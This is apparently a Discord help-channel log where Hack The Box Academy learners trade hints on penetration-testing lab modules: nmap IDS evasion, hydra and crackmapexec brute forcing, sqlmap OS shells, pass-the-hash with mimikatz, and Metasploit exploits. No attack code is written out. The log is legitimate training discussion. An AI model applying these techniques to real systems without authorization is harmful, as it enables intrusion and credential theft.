^

The Dark web 👻

So scary

probably visited a malicious site without any protection

yeah my fan makes loud noise

everyday

bruh

Can we please keep this channel on topic

Otherwise I will hand out mutes

Damn. I want to join the mod team so I can be a powermod who bosses people around. No fun at all. Literally change the topic for 2 seconds and mods threaten to mute

anyway shells and payloads is boring

what!?!

That was a good module

inb4 i bang my head against the wall for 5 hours

even though the vpn was downloaded on the system it wasnt activatd, it had to be reupdated and connected to HTB in the vm also

Attacking common services is boring

I just haven't gotten to anything i didn't know yet; also the module talks about importing an exploit... that is now in the exploitdb for msfconsole LMAO didn't even have to do that part

that's more what I mean by boring :) like it's definitely good info to have if you weren't already aware of these things it references

lmao nvm its not letting me type the pw now

You shouldn't see the password being typed

Does that help?

kinda I dont think its typing anything

when I hit enterthe connection closes

It shouldn't do that. Connecting to ssh is usually pretty simple so you might be overthinking something

You sure you aren't getting the connection closed because you are typing the password incorrectly maybe?

thats gotta be what it is

lmao ill try copypasting next time I got in I forgot it's still there even if its invisble

This is gonna be helpful for the future, but learning how to do some research will be very beneficial as you learn.

And also, not overthinking little things

GJ getting it figured out tho

yeah I watched some videos on it they just dont go over my specific problem and I feel like im wasting time when ive been on it all day, it wouldnt be so bad if I didnt work full time

Doing the modules and work is hard. A lot of time is sunk doing them

*I realize that doesnt mean I should only look at issues that can be walked through

good thing im insane lmao

Keep the discussion on topic about modules please

😠

just did sqlmap --os-shell question, LOL what a command

.-. i'm DUMBY i didn't realize that in burpsuite it was literally TELLING ME WHERE TO GO for this module

i...that's what I get for thinking it was just gonna be the same

which vpn would have the least latency for me if im from SEA

eu or americas

but idk where the Americas Servers are hosted

the latency is generally not going to be an issue tbh

unless you genuinely have terrible internet

hmm ok thanks

Where can I ask a question about the Nmap IDS/IPS evasion module? Is that here? I'm terribly stuck on the medium module and don't know how to proceed

How do I find the version of services running or the version of the DNS server through nmap? I tried lots of different scans but nothing yields a result (or I did find it but didn't realize that that was the answer)

You probably found it but didn't realize

Damn. What format is a DNS server version in?

Is it like the other 'flags'? HTB{Randommumbojumo}?

You tried running a nmap scan using UDP?

I believe I only did TCP

Out of curiosity; why would I scan using UDP? Edit: I just read online DNS uses UDP (is this true?) so scanning UDP should be the way?

Some services run on different protocols. Voice and video traffic, for UDP mainly. DNS runs on both TCP 53 which was used for zone transfers, and UDP used for queries lookups etc.

Moral of the story, enumeration is key.

@chilly forge Could also be the case that a sys admin or blue teamer has locked down DNS traffic on TCP port 53 on a firewall but has forgotten about UDP, as it’s normally allowed outbound to respond to DNS queries.

You're totally right! Thank you SO SO much. I've been stuck on this for days. Managed to get it now 😄

i let hydra run for 90 minutes and i still haven't brute forced sam's password

@chilly forge Awesome dude, don’t overthink the next lab, just replicate what’s in the modules, and you’ll be alright.

Thanks for the advice! i'll keep that in mind

i'm fully lost on Password Attacks - Password Mutations, i've tried the 17k line cut, i've tried searching for only 11-character passwords, i've tried attacking FTP, i've tried sort -u and breaking the file into 10 different chunks. i must have done something wrong but i have no clue what it is or where i could have made the mistake

sure the password isnt 10 characters?

i was searching for past suggestions and one of them was to only search for 11 character passwords

i'm guessing you're saying it's actually 10

i didnt take note of the exact password but my memory triggers on 10 or 11 for some reason

i just DM'ed you 😉

oh, htanks for teling because discord is kinda poopy with dms

Time to fill up my lovely colored magic balls on a happy sunday

someone can help me out with hacking passwords with hashcat dictionary attack section? Reply or DM me please

Looking for someone to save my sanity on Login Brute Forcing Skills Assessment Service Attacks.

For initial SSH brute force, created a list of usernames using username-anarchy, and a custom wordlist just using first name and last name but no joy.

🙏

can anyone suggest me from where i can learn the basics of imap commands?

Try the "Footprinting" module. That has a section on IMAP and POP3.

This is a great source

https://www.atmail.com/blog/imap-commands/

Guys I need to say and admit that WHOEVER designed and wrote the MODULE ‘LEARNING PROCESS’ is an absolute GENIUS! If you guy didn’t take your time to go through that module I would certainly encourage you to do so!!

Worth every ‘cube’ (penny) 😉

what do you get with ifconfig

is crackmapexec smb bruteforce slow and tries 1 credential at a time? or my program is broken
im doing password attacks network services
tried to increase threads but same result
same speed as msfconsole use auxiliary/scanner/smb/smb_login

~~I have asked about Attacking Common Applications - Attacking GitLab before too, specifically the user enumeration part. One of the hints were ||to try one of the unconventional wordlists in that directory||. I believe I have tried them all, and must be missing something.

Here is how I compiled a complete usernames list, that I have attempted:

REMOVED

I would greatly appreciate any further assistance, and this is literally the last flag I need to complete the path to do the CPTS exam.~~

Nevermind.... the FLAG submission is case sensitive...

is anyone on the working with web services module on the academy or can guide me on what i'm doing wrong, i'm working on starting the apache server however I continuously get the error 405, I've tried reinstalling and installing again and when I go to the local host it's the same thing.

Stuck on Password-Attacks PtH. I have used mimikatz to PtH. I can see DC01 and david.txt but i have tried everything to open the flag via cmd but i am unable to connect to \dc01\david. I tried net use. Nothing works. I can see the flag. But I'm unable to open the flag.

Nvm. For anything who's struggling with this: use type.

which module and service are you on?

I'm currently on the working with web services module, right towards the beginning as it's explaining web services and installing apache2 with the apt install command, and i've uninstalled the packages and reinstalled and tried to start services but still comes up with the error code. I've done the systemctl to check services and continuously shows the apache2.service not started

the Web Service & API Attacks module?

ahh, sorry it's under the linux fundamentals (relatively new)

ohh that one also this could be long so shoot me a dm i'll help your troubleshoot

appreciate it brother will do

which section are you on? also nope the pwnbox don't have the ens224 interface and the main interface for target is tun0

oh wait i think that section give you an attack box just rdp or ssh in and you should get something similar to the pwnbox but in the target network

i saw that i mean the section?

the 172 net should be from the foothold

not the pwnbox

oh yeah the foothold machine (not thm attack box) 🤣

nope the foothold machine is

simulating being an external actor, you have to connect to a foothold machine and use that to access the internal network

some of the labs being the foothold is another attack box you log into, simulating assessments where the client puts you directly on the internal network, but you still gotta connect to it.

if thats the lab setup yeah

foothold is a generic term im using here

Exactly

its not gunna be there

its gunna be on the machine you have to connect to

which is the foothold

you and your browser -> pwnbox sitting on the vpn -> foothold box that may or may not also be an attack box -> internal AD network

read what I said again

Im not sure how to be more explicit

@wheat ginkgo the box they provide (as an attack box) you either SSH or RDP into it, then you are in the internal AD network

the pwnbox is NOT the foothold

Exactly, the pwnbox is just your way into the attacker machine (linux or windows)

yeah if you were connecting from the vpn instead, youd still have to connect to the foothold

connect to pwnbox/vpn -> connect to foothold machine -> get interface

Can you tell me the basic stuff of hacking

Yes, google.com is the most basic

But how

I have no experience

if you head over to HTB Academy and sign up for an account you can start gaining experience by taking the course modules

There's a pinned post which might help:
#modules message

Hi guys, i'm stuck on Firewall and IDS/IPS Evasion - Medium Lab from "NETWORK ENUMERATION WITH NMAP" module

I tried a lot of ||different scan, source port modification, different Scan types|| but i keep having ||open/filtered, closed or filtered||. I also have 'too many fingerprint' error now. Any hint ? ^^

This lab was kinda buggy for me when i did it, i tried every thing and it was not working from my VPN machine, decided to jump into the pwnbox and it worked immediately

usually in the lab details where youre starting the target machine

itll say "RDP or ssh into blah with blah creds"

Can I use my ip address

Ipconfig

I am using the PwnBox 😭😭😭🤣

Oh cc RM !

Remember that ||DNS uses two protocols||

Im using ||UDP Scan || but got no correct result

Hello guys, I am doing Footprinting Lab - Hard. I've scanned the machine and have 5 ports open, the other 65530 are closed. Based on the description information I used previously gathered credentials from the Easy and the Medium lab and the provided resource text file to get any valid username or authentication, but with no luck. I appreciate any hints what to do ... 😌

read the top, "The third server is an MX and management server for the internal network." and think about stuff you learned throughout the module...hope that helps

I've read that and tried all possible credentials against every service, still no luck.

did you scan that port?

How can I post an image here ?

verify yourself first #welcome

make sure you enumerate everything, leave no datagram unturned

I believe so, I got ||22, 110, 143, 993 and 995||.

but I only have htb academy

I will keep digging ...

Module name: WEB REQUEST

Section name: HTTP METHOD(GET)

problem: on starting intance (machine) search.php not getting shown in browser devtools/networks request/ when i try to search city on the given spawn machine http web page.

Have you done this?
https://support.discord.com/hc/en-us/articles/6181726888215-Verification-Required-FAQ

yup

I tried to run the exploit 50064 but appears this messege: “Exploit failed: NoMethodError undefined method `split’ for nil:NilClass”
I don’t know how to solve it

this is from the shells and payloads module?

yup

you will have to check your module options for the exploit you're trying to use

already did

check again and see if you're missing an option

note that some options, although optional, are necessary in some cases

i got in

glad to see that the first section of that module rubbed off on you

||the problem was with vhost option||

not goona lie but it took me about 2 hours to solve question 3 of host2.

do you know how to verify my account, so I can upload images in this channel, I only have an htb academy account.

#welcome message

you'll probably have to create an htb account

that right

thanks

server side attacks, ssi injection exploit example. Can somebody tell me in which directory the flag is? can't find it...

Usually the module tells you where to look

true. found it

Just starting out with fundamental lessons, is it kind of expected that you'll use a search engine to figure out some stuff? There's stuff that I'm able to figure out just through the help documents but every now and then I get one that I don't think I ever would've figured out and have to read up on what the command is doing.

it'll be a mix; as some of the modules that are more advanced don't hold your hand

and you'll either be reading the man pages of a command

or googling your use case

Cool, thanks for feedback. I felt bad for looking up some stuff but I legit was hardstuck.

some of it also depends on your level of knowledge on things

but I would say taking notes doesn't hurt

even on fundamentals

Does anyone have good pointers for Blind XSS?

eventually you won't need to use the notes

BUT they are good to have

Yeah I'm def taking notes, it's the starting out with linux stuff. I'm coming completely from a windows / Cisco IOS background.

ah

yeah it's a rough transition from someone who's solely used windows to using linux

going from C:\Users\user to /home/user

but then you'll catch yourself trying to run linux commands in cmd

:^)

So true and then there's commands in Windows that use /? instead of --help or -h

prime example trying to do cp in windows; when it's copy

That always gets me too XD

or tracert vs traceroute

the amount of times I mix those up is criminal

googling stuff and looking up documentation is a core feature of this industry

Yeah I just felt bad doing it in academy, like at work no problem I'm googling that thing all f'n day if I need to lol

Hello guys, Can you help me on Attacking Common services hard lab? What can be done with this:

Line 1: Linked servers cannot be used under impersonation without a mapping for the impersonated login.

I'm cpts 100% w00t w00t

When do you take the exam?

I’m gonna spend around 40-60 hours studying my notes and redoing labs and then take it. So probably 9-17 days from now. Spent over 200 hours on this course so might take a break for a day or two @acoustic owl

Good luck for the exam

And as soonas I do that I’ll retake oscp which I expect I’ll be able to pass without more studying. A few ppl who hold both say if you can do cpts you’ll do oscp no prob

I’ve taken oscp exam twice and got about half way and what I’ve experienced in this course makes me feel more than prepared

Thanks 🙂

is it worth setting up a github to make it easier to download scripts, etc. for CPTS, or pentesting in general or is that not really needed...

OSCP can contain BOF, CPTS has no BOF. But otherwise it is supposed to be similar. I myself have not done OSCP. So I can't make a comparison

True but htb does have binary exploitation which I will take before hand and I actually did decent with bo in oscp tho I’m now rusty haha

But def something to study for sure

You can also save the cheatsheets on your PC. GitHub is not absolutely necessary.

I used cherry tree for all my notes is that what you mean. I also will have all exploits and hashes and everything used for labs on my device. My goal is to be able to through every lab blind tho I will look in my notes just not the solutions for the labs

Oh you mean cheat sheets of module ya that’s a good idea to save them all on host

@rustic sage when did u start the path

You can also write your own cheat sheets. It doesn't matter if you manage them in Cherry Tree or any other program. Use the one that is easiest for you.

About 2 to 2 1/2 months ago

WOW, what a great couple of sections for pass the hash and pass the ticket

@placid quest took me about 210 hours

Good luck @rustic sage

Which is insane bc when I first started I was so lazy lol but just built up to 5-8 hours a day as I progressed and it became second nature

Thanks man 🙂

If anyone needs help hit me up I’ll be able to help you quickly

@rustic sage That means u have done bug bounty path

Be careful not to get requests like "Can you hack my ex-girlfriend's Instagram account?". 🤣

Lol I would just ignore those haha already have gotten two like that

I’m 70% done with bug bounty and will pursue that once I get my other veers

Certs*

Cbbh actually looks easy looking at remaining modules

@rustic sage i am planning to do certs* if i complete the path

Don't underestimate CBBH

Don’t say IF. Just make up your mind and do it. Try to do a little more than the day before in terms of time spent studying eventually it’ll become second nature and you’ll rly enjoy it

Oh for sure I’m just saying the modules remaining seem easy to the ones I’ve already done. It’s like attacking Wordpress and a few other easy seeming ones I think I’ve already done the hardest portion of cbbh but I could def be wrong!

@acoustic owl Does that mean CBBH is hell

That depends on your skill level and stuff I think. Now the cbbh exam may be challenging as hell idk

No, but 21y4d has come up with some nice things for this exam.

The exam is difficult, but solvable

ok good to know i was on the right track with attacking this service lol I just had to clear my firefox cache; good thing I had burpsuite to sanity check me on the SSL cert

because HOLY was I gonna be banging my head on the wall trying to even find the exploit xD

I would appreciate a nudge if someone has the time on the sqlmap module concerning Case#3. I think I'm struggling with syntax

hi, OpenAI chat box is great for learning

DM

Actually nevermind. After about 100 attempts I realized what I was doing

Thanks anyways, I appreciate it.

it begins

have fun with that marcie

hope you have time and patience 😉

@dim cosmos Thanks for the attempted help. I figured it out the next day, just needed to step away and come at it fresh.

Best of luck

Try not to jump off a cliff

hello help me with this

Thanks

Gonna need more info than "help me with this"

Hey guys , is that exist a alternate way for increase "cube" without pay money?(like solve something and get reward or gift or like somethings)

No

You get the ~40 for starting, you get some cubes refunded when you complete a module so there's that

I think the level 0? ones are 10 cubes, but when you finish them, you get 10 back.

Is there a way to tell ffuf to only show you results that have a status code of 200?

Or any arbitrary status code, for that matter.

I know there's a blacklist filter ( -fc) but I don't remember the whitelist

Thanks. Surely if there's a blacklist filter, then there must be a whitelist one. I'll see what I can find out about that.

its the matcher

so you want -mc

look in the man page

its there

Excellent, tyvm

np

is anyone available to assit me on the IMAP/POP3 footprinting? i got in the IMAP server but im not seeing emails

it ends

enumerate

the IMAP server i mean.

ive done the enumeration

or POP3

on both

dig around

there are 0 emails for me to find. which im assuming the last question is wanting me to do

question is asking you to try to access the emails on the IMAP server

naturally, there should be emails on the server to access

yes. and it shows 0 emails

i cant select the dev.department.int which im assuming is just the above section. and the inbox shows 0 on both imap and pop3

there is an inbox containing some amount of emails

fiddle around with some of the IMAP commands you learned

yes ive been doing that. the one listed as INBOX is the only one i can select and it shows 0 exist

I got stuck on this but then used gui to read emails

Why http://gitlab.inlanefreight.local sometimes connects and sometimes not? Anyone had the same issue?

you used gui? like you installed a mail client and signed in using the given creds?

used evolution on parrot

let me try that route

you lifesaver you. that worked. but now im going to see if i can do this gui style too.

sorry in cli not gui

academy's giving me filtered ports so i can't do the exercise

hey guys

hey

o/

Looking for a little help. I have the user and the correct fail string and parameters for the Skill Assessment - Website in the Login Brute Forcing Module. I am not getting a hit with the usual password lists (rockyou-10.txt, rockyou (times out before completing). Any nudge in the right direction would be appreciated.

tamil

/love

Hi Htb dudes, I'm new here.
I have a question about the markup stage.
I have an issue in my burp suit every time I send a request for Daniel ssh key. I got 200 OK response
But the ssh key doesn't show in the response.
Please help me
Thanks in Advance. 🙏

200 ok just means that it accepted the request; not that it's going to send something back. I'd suggest taking a look into http response codes. Also what's the module you're working on?